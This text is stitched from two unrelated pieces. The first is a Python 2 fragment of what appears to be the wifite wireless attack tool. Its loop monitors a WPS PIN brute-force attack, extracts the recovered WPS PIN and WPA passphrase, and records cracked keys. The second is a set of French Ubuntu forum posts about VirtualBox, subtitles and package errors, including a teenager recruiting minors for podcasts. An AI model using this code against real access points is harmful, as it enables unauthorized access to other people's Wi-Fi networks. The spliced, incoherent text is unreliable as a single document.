    cracked = False   # Flag for when password/pin is found
    percent = 'x.xx%' # Percentage complete
    aps     = 'x'     # Seconds per attempt
    time_started = time.time()
    last_success = time_started # Time of last successful attempt
    last_pin = ''     # Keep track of last pin tried (to detect retries)
    retries  = 0      # Number of times we have attempted this PIN
    tries_total = 0      # Number of times we have attempted all pins
    tries    = 0      # Number of successful attempts
    pin = ''
    key = ''

    try:
        while not cracked:
            time.sleep(1)

            if proc.poll() != None:
                # Process stopped: Cracked? Failed? 
                inf = open(temp + 'out.out', 'r')
                lines = inf.read().split('\n')
                inf.close()
                for line in lines:
                    # When it's cracked:
                    if line.find("WPS PIN: '") != -1:
                        pin = line[line.find("WPS PIN: '") + 10:-1]
                    if line.find("WPA PSK: '") != -1:
                        key = line[line.find("WPA PSK: '") + 10:-1]
                        cracked = True
                break

            if not os.path.exists(temp + 'out.out'): continue

            inf = open(temp + 'out.out', 'r')
            lines = inf.read().split('\n')
            inf.close()

            for line in lines:
                if line.strip() == '': continue
                # Status
                if line.find(' complete @ ') != -1 and len(line) > 8:
                    percent = line.split(' ')[1]
                    i = line.find(' (')
                    j = line.find(' seconds/', i)
                    if i != -1 and j != -1: aps = line[i+2:j]
                # PIN attempt
                elif line.find(' Trying pin ') != -1:
                    pin = line.strip().split(' ')[-1]
                    if pin == last_pin: 
                        retries += 1
                    elif tries_total == 0:
                        last_pin = pin
                        tries_total -= 1
                    else:
                        last_success = time.time()
                        tries += 1
                        last_pin = pin
                        retries = 0
                    tries_total += 1

                # Warning
                elif line.endswith('10 failed connections in a row'): pass

                # Check for PIN/PSK
                elif line.find("WPS PIN: '") != -1:
                    pin = line[line.find("WPS PIN: '") + 10:-1]
                elif line.find("WPA PSK: '") != -1:
                    key = line[line.find("WPA PSK: '") + 10:-1]
                    cracked = True
                if cracked: break

            print ' %s WPS attack, %s success/ttl,' % \
                                    (GR+sec_to_hms(time.time()-time_started)+W, \
                                    G+str(tries)+W+'/'+O+str(tries_total)+W),

            if percent == 'x.xx%' and aps == 'x': print '\r',
            else:
                print '%s complete (%s sec/att)   \r' % (G+percent+W, G+aps+W),


            if WPS_TIMEOUT > 0 and (time.time() - last_success) > WPS_TIMEOUT:
                print R+'\n [!]'+O+' unable to complete successful try in %d seconds' % (WPS_TIMEOUT)
                print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
                break

            if WPS_MAX_RETRIES > 0 and retries > WPS_MAX_RETRIES:
                print R+'\n [!]'+O+' unable to complete successful try in %d retries' % (WPS_MAX_RETRIES)
                print R+' [+]'+O+' the access point may have WPS-locking enabled, or is too far away'+W
                print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
                break

            if WPS_RATIO_THRESHOLD > 0.0 and tries > 0 and (float(tries) / tries_total) < WPS_RATIO_THRESHOLD:
                print R+'\n [!]'+O+' successful/total attempts ratio was too low (< %.2f)' % (WPS_RATIO_THRESHOLD)
                print R+' [+]'+W+' skipping %s' % (G+target.ssid+W)
                break

            stdout.flush()
            # Clear out output file if bigger than 1mb
            inf = open(temp + 'out.out', 'w')
            inf.close()

        # End of big "while not cracked" loop

        if cracked:
            if pin != '': print GR+'\n\n [+]'+G+' PIN found:     %s' % (C+pin+W)
            if key != '': print GR+' [+] %sWPA key found:%s %s' % (G, W, C+key+W)
            WPA_FINDINGS.append(W+"found %s's WPA key: \"%s\", WPS PIN: %s" % (G+target.ssid+W, C+key+W, C+pin+W))
            WPA_FINDINGS.append('')

            save_cracked(target.bssid, target.ssid, "Key is '" + key + "' and PIN is '" + pin + "'", 'WPA')

    except KeyboardInterrupt:
        print R+'\n (^C)'+O+' WPS brute-force attack interrupted'+W
        if attack_interrupted_prompt():
            send_interrupt(proc)
            print ''
            exit_gracefully(0)

    send_interrupt(proc)

    return cracked



#c = CapFile('hs/KillfuckSoulshitter_C0-C1-C0-07-54-DC_2.cap', 'Killfuck Soulshitter', 'c0:c1:c0:07:54:dc')
#WPA_CRACKER = 'aircrack'
#cracked = wpa_crack(c)
#print cracked
#exit_gracefully(1)

if __name__ == '__main__':
    try:
        banner()
        main()
    except KeyboardInterrupt: print R+'\n (^C)'+O+' interrupted\n'+W
    except EOFError:          print R+'\n (^D)'+O+' interrupted\n'+W

    exit_gracefully(0) 

#12 -1 »  Cherche des gens pour parler » Le 11/12/2011, à 18:39

coyote-mania
Réponses : 35

Salut,
Nous des sommes des jeunes geek confirmés, nous avons des connaissance en blogging (chacun a fait son blog, donc nous somme assez expérimentés) . Nous sommes confirmés dans le domaine du libre et sur Linux


Nous somme que pour l'instant deux moi j'ai 14 ans et thebeautifulgeek a 15 ans, on est déjà confirmé, thebeautiful geek a pas mal d'expérience sur plusieurs distribution Linux, il a aussi un projet sur une distribution Linux, on a chacun notre blog (voir commentaire plus bas) et moi je suis aller plusieurs fois à des Ubuntu Party. 

Nous recherchons des jeunes (-18) geek des gamers ou simplement des gens intéressés pour vouloir faire des podcast pour débattre sur tout et n'importe quoi, si vous vous sentez prêt pour l'aventure ou si vous vous voulez plus d'infos,
contactés nous par mail: futurpodcasteur[at]gmail[dot]com

#13 Re : -1 »  Cherche des gens pour parler » Le 14/12/2011, à 09:00

coyote-mania
Réponses : 35

bon sinon à pars de nous vanner sur nos fautes d'orthographes, je suppose que tout le monde ici a plus de dix huit ans, non ?

Alors si vous avez plus, bein pourquoi vous venez parler ? smile

#14 Re : -1 »  Cherche des gens pour parler » Le 14/12/2011, à 13:32

coyote-mania
Réponses : 35
c4nuser a écrit :
David a écrit :

C'est amusant. Presque. Le troll manque encore d'ampleur et de couleurs. Encore un effort.

Moi, je dirais qu'il manque de pilosité. C'est une sorte de troll imberbe (logique, vu son jeune age). Ce qui impressionne moins.

Imberbe ou ne pas être imberbe t'elle est la question.

Mais la questions n'est pas là. La question est: est ce que vous êtes ici pour postuler pour notre annonce ... ou pas ?



Sinon ouaip je sais que ce forum est ouvert à tout le monde, encore faut-il que les gens ne soit pas hors-sujet lorsque'on parle d'un sujet particulier ...

#15 Re : -1 »  Logiciel de sous-titrage sous linux ? » Le 27/02/2011, à 20:43

coyote-mania
Réponses : 304

salut je relance le topic, car moi même j'ai du mal a incruster mes sous-titre dans une vidéo, j'ai testé avec Avidemux, mais quand je veux voir un aperçu en mode sortie, je ne vois pas mes sous-titre.
J'ai bien fait toute les manip, j'ai sélectionner mes sous-titre ma police mais rien n'y fait.
Comment faire ??

#16 -1 »  Une FATAL ERROR dans virtualbox » Le 04/02/2011, à 21:51

coyote-mania
Réponses : 7

Bonsoir, a tous.
Voilà j'ai installé VirtualBox de chez sun et je tente de faire émuler windows 3.1, pour créer ma nouvelle machine virtuelle je suis plusieurs tutoriel sur le net, mais quand je veux démarrer ma machine un message d'erreur me dit:
FATAL: Could not read from the boot medium . System Halted

Comment remédier a ce problème merci

( je suis sous Ubuntu 1.10)

#17 Re : -1 »  Une FATAL ERROR dans virtualbox » Le 06/02/2011, à 19:18

coyote-mania
Réponses : 7

alors, personne pour m'aider ?

#18 Re : -1 »  Une FATAL ERROR dans virtualbox » Le 08/02/2011, à 19:54

coyote-mania
Réponses : 7

ok oui je pense que mon windows 3.1 n'est pas bootable ( j'ai même voulu tester avec un windows 1.0), je verrais si sa marche ou si sa marche pas il risque d'y avoir encore un message sur se post lol
Et puis comment on fait pour rendre Un CD ( virtuelle) bootable ?

Merci

#19 Re : -1 »  Une FATAL ERROR dans virtualbox » Le 12/02/2011, à 16:48

coyote-mania
Réponses : 7

pour  Windows 3.1 et Windows 98 je les ait en ISO, et j'ai Windows 1.0 en fichier, je crois que ce sont des format disquette et je ne sais pas comment les démarrer sous Virtual box.
Pour DOS, j'ai vue une vidéo d'une personne qui installe windows 1.0 sous DOS qui est émuler par un émulateur " made in microsoft"
Bon voilà, Merci !!

#20 -1 »  les enregistrement de Outrec son muet... » Le 31/12/2010, à 18:05

coyote-mania
Réponses : 0

Bonsoir
Bon voilà, je suis sous Ubuntu 10.10 et j'ai installer Outrec a partir du .deb
tous vas bien, le logiciel se lance normalement, l'enregistrement aussi, la sauvegarde de l'enregsitrement aussi mais l'enregistrement est muet, comment faire pour que l'ont fasse un enregistrement audible hmm
merci

#21 -1 »  démarage automatique en mode console sur ubuntu » Le 25/12/2010, à 20:47

coyote-mania
Réponses : 0

Bonsoir, j'épsère que vous avez passer un joyeux noêl, en tous cas pour moi c'était le cas. bref heu voilà j'ai Ubuntu 10.10 et quand je veux démarrer mon PC il y a une page d'erreur qui s'affiche et qui me dit que un port " machin" a mal été reconnu. jusque à tous est normql car avant j'ai bidouillé un fichier de configuration des port pour installer une imprimante.
Bref avant on me proposais de passer cette étape et de continuer normalement et après ubuntu continuais normalement avec une interface graphique.
mais là quand je veux passer cette étape , ubuntu me met directement en mode console.
Donc je fais startx et là j'ai la session root ( qui est en anglais) et j'ai lue sur d'autre site que l'ont pouvait modifier l'interface par défaut ( et que le 5 c'était pour l'interface graphique) et tous sa grâce au fichier /etc/inittab
oui mais voilà mon fichier inittab est introuvable
comment faire

modération: la section accessibilité sert à répondre aux questions liées au handicap je change ton message de section pour qu'il ait plus de chances d'avoir des réponses
kinouchou

#22 Re : -1 »  ubuntu se rebelle ( impossible de déverouiller administration ) » Le 18/12/2010, à 21:41

coyote-mania
Réponses : 11

voila se que sa me donne pour sudo dpkg --configure --force-all -a :
Paramétrage de samba-common (2:3.5.4~dfsg-1ubuntu8.1) ...
dpkg : erreur de traitement de samba-common (--configure) :
le sous-processus script post-installation installé a retourné une erreur de sortie d'état 10
Des erreurs ont été rencontrées pendant l'exécution :
samba-common

#23 Re : -1 »  ubuntu se rebelle ( impossible de déverouiller administration ) » Le 19/12/2010, à 11:27

coyote-mania
Réponses : 11

pour vous aidez aussi un peu j'arrive pas a faire mes mises a jour, il me disent qu'il est arrivé un problème lors de l'installation des packer dkpg

#24 Re : -1 »  Problème au moent de l'installation de Ubuntu 10.10 » Le 11/12/2010, à 22:00

coyote-mania
Réponses : 5

c'est bon j'ai pue cliquez sur suivant mais je reste toujours prudent sur l'installation...